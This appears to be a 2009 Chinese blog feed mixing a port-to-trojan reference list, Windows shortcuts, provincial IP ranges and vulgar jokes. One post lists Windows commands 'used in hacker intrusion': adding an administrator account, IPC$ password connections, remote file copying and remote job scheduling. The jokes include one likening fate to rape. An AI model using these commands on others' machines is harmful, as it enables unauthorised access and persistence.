TCP 32100=PeanutBrittle
TCP 32418=Acid Battery
TCP 33333=Prosiak,Blakharaz 1.0
TCP 33577=Son Of Psychward
TCP 33777=Son Of Psychward
TCP 33911=Spirit 2001a
TCP 34324=BigGluck,TN,Tiny Telnet Server
TCP 34555=Trin00 (Windows) (DDoS)
TCP 35555=Trin00 (Windows) (DDoS)
TCP 36794=Worm.Bugbear-A
TCP 37651=YAT
TCP 40412=The Spy
TCP 40421=Agent 40421,Masters Paradise.96
TCP 40422=Masters Paradise
TCP 40423=Masters Paradise.97
TCP 40425=Masters Paradise
TCP 40426=Masters Paradise 3.x
TCP 41666=Remote Boot
TCP 43210=Schoolbus 1.6/2.0
TCP 44444=Delta Source
TCP 44445=Happypig
TCP 45576=未知代理
TCP 47252=Prosiak
TCP 47262=Delta
TCP 47878=BirdSpy2
TCP 49301=Online Keylogger
TCP 50505=Sockets de Troie
TCP 50766=Fore, Schwindler
TCP 51966=CafeIni
TCP 53001=Remote Windows Shutdown
TCP 53217=Acid Battery 2000
TCP 54283=Back Door-G, Sub7
TCP 54320=Back Orifice 2000,Sheep
TCP 54321=School Bus .69-1.11,Sheep, BO2K
TCP 57341=NetRaider
TCP 58008=BackDoor.Tron
TCP 58009=BackDoor.Tron
TCP 58339=ButtFunnel
TCP 59211=BackDoor.DuckToy
TCP 60000=Deep Throat
TCP 60068=Xzip 6000068
TCP 60411=Connection
TCP 60606=TROJ_BCKDOR.G2.A
TCP 61466=Telecommando
TCP 61603=Bunker-kill
TCP 63485=Bunker-kill
TCP 65000=Devil, DDoS
TCP 65432=Th3tr41t0r, The Traitor
TCP 65530=TROJ_WINMITE.10
TCP 65535=RC,Adore Worm/Linux
TCP 69123=ShitHeep
TCP 88798=Armageddon,Hack Office
UDP 1=Sockets des Troie
UDP 9=Chargen
UDP 19=Chargen
UDP 69=Pasana
UDP 80=Penrox
UDP 371=ClearCase版本管理软件
UDP 445=公共Internet文件系统(CIFS)
UDP 500=Internet密钥交换
UDP 1025=Maverick’s Matrix 1.2 - 2.0
UDP 1026=Remote Explorer 2000
UDP 1027=UC聊天软件,Trojan.Huigezi.e
UDP 1028=3721上网助手(用途不明,建议用户警惕!),KiLo,SubSARI
UDP 1029=SubSARI
UDP 1031=Xot
UDP 1032=Akosch4
UDP 1104=RexxRave
UDP 1111=Daodan
UDP 1116=Lurker
UDP 1122=Last 2000,Singularity
UDP 1183=Cyn,SweetHeart
UDP 1200=NoBackO
UDP 1201=NoBackO
UDP 1342=BLA trojan
UDP 1344=Ptakks
UDP 1349=BO dll
UDP 1561=MuSka52
UDP 1772=NetControle
UDP 1978=Slapper
UDP 1985=Black Diver
UDP 2000=A-trojan,Fear,Force,GOTHIC Intruder,Last 2000,Real 2000
UDP 2001=Scalper
UDP 2002=Slapper
UDP 2015=raid-cs
UDP 2018=rellpack
UDP 2130=Mini BackLash
UDP 2140=Deep Throat,Foreplay,The Invasor
UDP 2222=SweetHeart, Way
UDP 2339=Voice Spy
UDP 2702=Black Diver
UDP 2989=RAT
UDP 3150=Deep Throat
UDP 3215=XHX
UDP 3333=Daodan
UDP 3801=Eclypse
UDP 3996=Remote Anything
UDP 4128=RedShad
UDP 4156=Slapper
UDP 4500=sae-urn
UDP 5419=DarkSky
UDP 5503=Remote Shell Trojan
UDP 5555=Daodan
UDP 5882=Y3K RAT
UDP 5888=Y3K RAT
UDP 6112=Battle.net Game
UDP 6666=KiLo
UDP 6667=KiLo
UDP 6766=KiLo
UDP 6767=KiLo,UandMe
UDP 6838=Mstream Agent-handler
UDP 7028=未知木马
UDP 7424=Host Control
UDP 7788=Singularity
UDP 7983=MStream handler-agent
UDP 8012=Ptakks
UDP 8090=Aphex’s Remote Packet Sniffer
UDP 8127=9_119,Chonker
UDP 8488=KiLo
UDP 8489=KiLo
UDP 8787=BackOrifice 2000
UDP 8879=BackOrifice 2000
UDP 9325=MStream Agent-handler
UDP 10000=XHX
UDP 10067=Portal of Doom
UDP 10084=Syphillis
UDP 10100=Slapper
UDP 10167=Portal of Doom
UDP 10498=Mstream
UDP 10666=Ambush
UDP 11225=Cyn
UDP 12321=Protoss
UDP 12345=BlueIce 2000
UDP 12378=W32/Gibe@MM
UDP 12623=ButtMan,DUN Control
UDP 15210=UDP remote shell backdoor server
UDP 15486=KiLo
UDP 16514=KiLo
UDP 16515=KiLo
UDP 18753=Shaft handler to Agent
UDP 20433=Shaft
UDP 21554=GirlFriend
UDP 22784=Backdoor.Intruzzo
UDP 23476=Donald Dick
UDP 25123=MOTD
UDP 26274=Delta Source
UDP 26374=Sub-7 2.1
UDP 26444=Trin00/TFN2K
UDP 26573=Sub-7 2.1
UDP 27184=Alvgus trojan 2000
UDP 27444=Trinoo
UDP 29589=KiLo
UDP 29891=The Unexplained
UDP 30103=NetSphere
UDP 31320=Little Witch
UDP 31335=Trin00 DoS Attack
UDP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO
UDP 31338=Back Orifice, NetSpy DK, DeepBO
UDP 31339=Little Witch
UDP 31340=Little Witch
UDP 31416=Lithium
UDP 31787=Hack aTack
UDP 31789=Hack aTack
UDP 31790=Hack aTack
UDP 31791=Hack aTack
UDP 33390=未知木马
UDP 34555=Trinoo
UDP 35555=Trinoo
UDP 43720=KiLo
UDP 44014=Iani
UDP 44767=School Bus
UDP 46666=Taskman
UDP 47262=Delta Source
UDP 47785=KiLo
UDP 49301=OnLine keyLogger
UDP 49683=Fenster
UDP 49698=KiLo
UDP 52901=Omega
UDP 54320=Back Orifice
UDP 54321=Back Orifice 2000
UDP 54341=NetRaider Trojan
UDP 61746=KiLO
UDP 61747=KiLO
UDP 61748=KiLO
UDP 65432=The Traitor

黑客入侵中常用的命令

414664728@qq.com(天) — Thu, 21 May 2009 09:47:06 GMT

黑客入侵中常用的命令：
*net user 查看用户列表
*net user 用户名密码 /add 添加用户
*net user 用户名密码更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名查看该共享的情况
*net share 共享名=路径设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net use 查看IPC$连接情况
*net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" ipc$连接
*net time [url=file://\\ip]\\ip[/url] 查看远程计算机上的时间
*copy 路径:\文件名 [url=file://\\ip\]\\ip\[/url]共享名复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*ftp 服务器地址进入FTP服务器
*at 查看自己计算机上的计划作业
*at [url=file://\\ip]\\ip[/url] 查看远程计算机上的计划作业
*at [url=file://\\ip]\\ip[/url] 时间命令(注意加盘符) 在远程计算机上加一个作业
*at [url=file://\\ip]\\ip[/url] 计划作业ID /delete 删除远程计算机上的一个计划作业
*at [url=file://\\ip]\\ip[/url] all /delete 删除远程计算机上的全部计划作业
　
珍藏的最全的windows操作系统快捷键
一、常见用法：
F1　　　　　　　　　　　显示当前程序或者windows的帮助内容。
F2　　　　　　　　　　　当你选中一个文件的话，这意味着“重命名”
F3　　　　　　　　　　　当你在桌面上的时候是打开“查找：所有文件” 对话框
F10或ALT　　　　　　　　激活当前程序的菜单栏
windows键或CTRL+ESC　　打开开始菜单
CTRL+ALT+DELETE　　　　在win9x中打开关闭程序对话框
DELETE　　　　　　　　　删除被选择的选择项目，如果是文件，将被放入回收站
SHIFT+DELETE　　　　　　删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站
CTRL+N　　　　　　　　　新建一个新的文件
CTRL+O　　　　　　　　　打开“打开文件”对话框
CTRL+P　　　　　　　　　打开“打印”对话框
CTRL+S　　　　　　　　　保存当前操作的文件
CTRL+X　　　　　　　　　剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C　复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V　粘贴剪贴板中中的内容到当前位置
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE　　重做上一步被撤销的操作
　
Windows键+M　　　　　　最小化所有被打开的窗口。
Windows键+CTRL+M　　　　重新将恢复上一项操作前窗口的大小和位置
Windows键+E　　　　　　打开资源管理器
Windows键+F　　　　　　打开“查找：所有文件”对话框
Windows键+R　　　　　　打开“运行”对话框
Windows键+BREAK　　　　打开“系统属性”对话框
Windows键+CTRL+F　　　　打开“查找：计算机”对话框
SHIFT+F10或鼠标右击　　打开当前活动项目的快捷菜单
SHIFT　　　　　　　　　在放入CD的时候按下不放，可以跳过自动播放CD。在打开word的时候按下不放，可以跳过自启动的宏
　
ALT+F4　　　　　　　　　关闭当前应用程序
ALT+SPACEBAR　　　　　　打开程序最左上角的菜单
ALT+TAB　　　　　　　　切换当前程序
ALT+ESC　　　　　　　　切换当前程序
ALT+ENTER　　　　　　　将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换
PRINT SCREEN　　　　　　将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN　　　　将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4　　　　　　　　关闭当前应用程序中的当前文本（如word中）
CTRL+F6　　　　　　　　切换到当前应用程序中的下一个文本（加shift 可以跳到前一个窗口）
在IE中：
ALT+RIGHT ARROW　　　　显示前一页（前进键）
ALT+LEFT ARROW　　　　　显示后一页（后退键）
CTRL+TAB　　　　　　　　在页面上的各框架中切换（加shift反向）
F5　　　　　　　　　　　刷新
CTRL+F5　　　　　　　　强行刷新
　
　　目的快捷键
　　激活程序中的菜单栏 F10
　　执行菜单上相应的命令 ALT+菜单上带下划线的字母
　　关闭多文档界面程序中的当
　　前窗口 CTRL+ F4
　　关闭当前窗口或退出程序 ALT+ F4
　　复制 CTRL+ C
　　剪切 CTRL+ X
　　删除 DELETE
　　显示所选对话框项目的帮助 F1
　　显示当前窗口的系统菜单 ALT+空格键
　　显示所选项目的快捷菜单 SHIFT+ F10
　　显示“开始”菜单 CTRL+ ESC
　　显示多文档界面程序的系统
　　菜单 ALT+连字号(-)
　　粘贴 CTR L+ V
　　切换到上次使用的窗口或者
　　按住 ALT然后重复按TAB，
　　切换到另一个窗口 ALT+ TAB
　　撤消 CTRL+ Z
二、使用“Windows资源管理器”的快捷键
　　目的快捷键
　　如果当前选择展开了,要折
　　叠或者选择父文件夹左箭头
　　折叠所选的文件夹 NUM LOCK+负号(-)
　　如果当前选择折叠了，要展开
　　或者选择第一个子文件夹右箭头
　　展开当前选择下的所有文件夹 NUM LOCK+*
　　展开所选的文件夹 NUM LOCK+加号(+)
　　在左右窗格间切换 F6
三、使用 WINDOWS键
　　可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。
　　目的快捷键
　　在任务栏上的按钮间循环 WINDOWS+ TAB
　　显示“查找：所有文件” WINDOWS+ F
　　显示“查找：计算机” CTRL+ WINDOWS+ F
　　显示“帮助” WINDOWS+ F1
　　显示“运行”命令 WINDOWS+ R
　　显示“开始”菜单 WINDOWS
　　显示“系统属性”对话框 WINDOWS+ BREAK
　　显示“Windows资源管理器” WINDOWS+ E
　　最小化或还原所有窗口 WINDOWS+ D
　　撤消最小化所有窗口 SHIFT+ WINDOWS+ M
四、使用“我的电脑”和“Windows资源管理器”的快捷键
　　目的快捷键
　　关闭所选文件夹及其所有父
　　文件夹按住 SHIFT键再单击“关闭按钮（仅适用于“我的电脑”）
　　向后移动到上一个视图 ALT+左箭头
　　向前移动到上一个视图 ALT+右箭头
　　查看上一级文件夹 BACKSPACE
五、使用对话框中的快捷键
　　目的快捷键
　　取消当前任务 ESC
　　如果当前控件是个按钮，要
　　单击该按钮或者如果当前控
　　件是个复选框，要选择或清
　　除该复选框或者如果当前控
　　件是个选项按钮，要单击该
　　选项空格键
　　单击相应的命令 ALT+带下划线的字母
　　单击所选按钮 ENTER
　　在选项上向后移动 SHIFT+ TAB
　　在选项卡上向后移动 CTRL+ SHIFT+ TAB
　　在选项上向前移动 TAB
　　在选项卡上向前移动 CTRL+ TAB
　　如果在“另存为”或“打开”
　　对话框中选择了某文件夹，
　　要打开上一级文件夹 BACKSPACE
　　在“另存为”或“打开”对
　　话框中打开“保存到”或
　　“查阅” F4
　　刷新“另存为”或“打开”
　　对话框 F5
六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键
　　选择项目时，可以使用以下快捷键。
　　目的快捷键
　　插入光盘时不用“自动播放”
　　功能按住 SHIFT插入 CD-ROM
　　复制文件按住 CTRL拖动文件
　　创建快捷方式按住 CTRL+SHIFT拖动文件
　　立即删除某项目而不将其放入 SHIFT+DELETE
　　“回收站”
　　显示“查找：所有文件” F3
　　显示项目的快捷菜单 APPLICATION键
　　刷新窗口的内容 F5
　　重命名项目 F2
　　选择所有项目 CTRL+ A
　　查看项目的属性 ALT+ ENTER或 ALT+双击
　　可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键
七、Microsoft放大程序的快捷键
　　这里运用Windows徽标键和其他键的组合。
　　快捷键目的
　　Windows徽标+PRINT SCREEN将屏幕复制到剪贴板（包括鼠标光标）
　　Windows徽标+SCROLL LOCK将屏幕复制到剪贴板（不包括鼠标光标）
　　Windows徽标+ PAGE UP切换反色。
　　Windows徽标+ PAGE DOWN切换跟随鼠标光标
　　Windows徽标+向上箭头增加放大率
　　Windows徽标+向下箭头减小放大率
　
八、使用辅助选项快捷键
　　目的快捷键
　　切换筛选键开关右SHIFT八秒
　　切换高对比度开关左ALT+左SHIFT+PRINT SCREEN
　　切换鼠标键开关左ALT+左SHIFT+NUM LOCK
　　切换粘滞键开关 SHIFT键五次
　　切换切换键开关 NUM LOCK五秒

弄来这些希望大家喜欢这些东西是网上找来的

414664728@qq.com(天) — Thu, 21 May 2009 07:34:07 GMT

上海市
58.32.0.0 58.38.255.255
61.129.36.0 61.129.201.255
61.151.55.0 61.152.217.255
61.170.0.0 61.173.174.255
202.109.79.0 202.109.116.255
218.1.30.0 218.1.255.255
218.78.153.0 218.83.255.255
221.239.134.0 222.73.255.255

湖南省
61.186.74.0 61.186.119.255
61.187.2.0 61.187.223.255
218.75.135.76 218.77.103.255
220.168.18.95 220.170.255.255
222.240.0.0 222.245.223.255

湖北省
58.48.0.0 58.53.94.255
61.136.148.0 61.136.254.133
61.183.17.64 61.184.253.72
202.103.12.0 202.103.12.69
210.5.128.0 210.5.143.255
219.138.15.0 219.140.255.125
221.232.0.0 221.235.255.255

重庆
61.128.168.144 61.128.238.255
219.151.128.0 219.153.225.255
218.70.12.21 218.70.255.255
219.151.128.0 219.153.225.255
222.180.22.22 222.180.22.22

广东
59.32.0.0 59.42.255.255
59.42.255.255 61.146.243.255
202.103.137.0 202.105.248.255
218.13.6.0 218.20.255.255
219.128.0.0 219.137.254.255

辽宁省
59.44.84.0 59.45.239.255
218.24.0.65 218.25.232.255
218.61.32.0 218.61.218.255
219.148.246.5 219.149.93.40

江西
59.50.244.0 59.55.255.255
61.180.8.0 61.180.93.48
218.64.14.203 218.65.81.255
218.87.0.0 218.87.253.200
218.95.9.0 218.95.93.255
219.159.112.167 219.159.213.87
220.175.24.0 220.176.255.255

浙江
61.153.26.0 61.153.240.82
61.174.109.0 61.175.242.255
218.0.6.0 218.0.255.0
218.71.8.0 218.75.119.255
220.184.62.0 220.191.143.255

安徽省
60.166.0.0 60.173.65.255
61.190.0.0 61.191.255.255
218.22.1.134 218.23.255.255
220.178.76.7 220.180.255.255

四川省
61.157.112.0 61.157.226.237
61.188.0.0 61.188.219.255
202.98.151.0 202.98.156.255
218.6.135.199 218.6.215.255
218.88.0.0 218.89.191.255
220.166.2.60 220.167.110.255
221.236.11.0 221.237.238.255
222.208.4.0 222.215.112.255

福建省
59.56.0.0 59.61.240.255
61.154.7.0 61.154.255.255
218.5.0.0 218.6.81.255
218.66.0.0 218.66.246.255
218.85.0.0 218.86.127.255
220.160.4.5 220.162.225.255
222.76.0.0 222.79.254.255

江苏省
61.132.88.0 61.132.110.255
61.155.56.0 61.155.216.88
61.177.0.0 61.177.250.49
218.2.0.0 218.4.243.255
218.90.36.0 218.94.239.255
221.224.113.0 221.231.121.197
222.92.198.0 222.95.240.255
222.184.12.0 222.191.242.255

广西
218.21.70.19 218.21.127.255
218.65.214.0 218.65.240.255
219.159.112.167 219.159.213.87
220.173.26.116 220.173.255.255
222.83.128.0 222.84.226.255
222.216.0.0 222.218.203.255

经典的谎话！

414664728@qq.com(天) — Fri, 15 May 2009 04:28:28 GMT

命运就像强奸，你反抗不了就要学会享受.

工作就像轮奸，,你不行了别人就上.

生活就像自慰，,什么都得靠自己双手

学习就像嫖娼，出完钱后又出力

工资就像例假，一月不来你就傻眼

谈判就像******，费尽了口舌也就那点收获

捐款就像发情，一想起来马上就要

奖金就像阴毛，掉的要比长的多

领导就像******，总是欺软怕硬

开会就像乱伦，搞不清谁该搞谁

兄弟像避孕套，桶多大的娄子都帮你兜着

看贴不回的就像阳痿，明明看爽了，就是没动作！！！

天